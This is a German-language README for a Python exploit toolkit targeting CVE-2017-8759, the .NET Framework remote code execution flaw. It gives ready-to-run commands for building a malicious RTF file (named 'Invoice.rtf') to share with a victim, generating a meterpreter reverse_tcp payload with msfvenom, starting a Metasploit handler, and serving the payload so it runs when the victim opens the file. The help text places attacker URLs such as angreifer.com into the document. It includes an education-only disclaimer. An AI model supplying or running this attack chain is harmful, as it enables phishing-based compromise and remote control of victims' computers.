
Exploit toolkit CVE-2017-8759 - v1.0 ist ein praktisches Python-Skript, das Pentestern und Sicherheitsforschern eine schnelle und effektive Möglichkeit bietet, die Microsoft .NET Framework RCE zu testen. Es kann eine bösartige RTF-Datei erzeugen und Metasploit / Meterpreter / andere Payloads ohne komplexe Konfiguration an das Opfer ausliefern.
Das Exploit-Toolkit CVE-2017-8759 - v1.0 ist ein praktisches Python-Skript, das Pentestern und Sicherheitsforschern eine schnelle und effektive Möglichkeit bietet, die Microsoft .NET Framework RCE zu testen. Es kann eine bösartige RTF-Datei generieren und metasploit-/meterpreter-/andere Payloads ohne aufwändige Konfiguration an das Opfer ausliefern.
Dieses Programm ist NUR für Bildungszwecke bestimmt. Verwenden Sie es nicht ohne Erlaubnis. Der übliche Haftungsausschluss gilt, insbesondere die Tatsache, dass ich (bhdresh) nicht haftbar bin für Schäden, die durch direkte oder indirekte Nutzung der von diesen Programmen bereitgestellten Informationen oder Funktionalitäten entstehen. Der Autor oder ein Internetanbieter übernimmt KEINE Verantwortung für den Inhalt oder Missbrauch dieser Programme oder ihrer Ableitungen. Durch die Nutzung dieses Programms akzeptieren Sie, dass jegliche Schäden (Datenverlust, Systemabsturz, Systemkompromittierung usw.), die durch die Nutzung dieser Programme verursacht werden, nicht in der Verantwortung von bhdresh liegen.
Schließlich handelt es sich um eine persönliche Entwicklung, bitte respektieren Sie deren Philosophie und verwenden Sie sie nicht für böse Dinge!
CC BY 4.0 Lizenz - https://creativecommons.org/licenses/by/4.0/
Im Skript wurden folgende Fähigkeiten eingeführt:
- Generieren einer bösartigen RTF-Datei
- Exploit-Modus für generierte RTF-Datei
Version: Python 2.7.13
1) Bösartige RTF-Datei generieren
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optional, bei Verwendung von MSF Payload): Metasploit-Payload generieren und Handler starten
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Toolkit im Exploit-Modus starten, um lokalen Payload auszuliefern
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
Dies ist ein praktisches Toolkit zum Ausnutzen von CVE-2017-8759 (Microsoft .NET Framework RCE)
Modi:
-M gen Nur bösartige Datei generieren
Bösartige RTF-Datei generieren:
-w <Dateiname.rtf> Name der bösartigen RTF-Datei (Teilen Sie diese Datei mit dem Opfer).
-u <http://angreifer.com/test.txt> Pfad der entfernten Textdatei. Normalerweise sollte dies eine Domain oder IP sein, auf der dieses Tool läuft.
Zum Beispiel http://angreiferip.com/test.txt (Diese URL wird in die bösartige RTF-Datei eingefügt und wird angefordert, sobald das Opfer die bösartige RTF-Datei öffnet).
-M exp Exploit-Modus starten
Ausnutzung:
-p <TCP-Port:Standard 80> Lokale Portnummer.
-e <http://angreifer.com/shell.exe> Pfad einer ausführbaren Datei / meterpreter-Shell / Payload, die auf dem Ziel ausgeführt werden soll.
-l </tmp/shell.exe> Lokalen Pfad einer ausführbaren Datei / meterpreter-Shell / Payload angeben.
@bhdresh
@Voulnet, @vysec, @bhdresh
Offensichtlich bin ich kein Vollzeitentwickler, also erwarten Sie einige Hürden.
Bitte melden Sie Fehler und Probleme über https://github.com/bhdresh/CVE-2017-8759/issues/new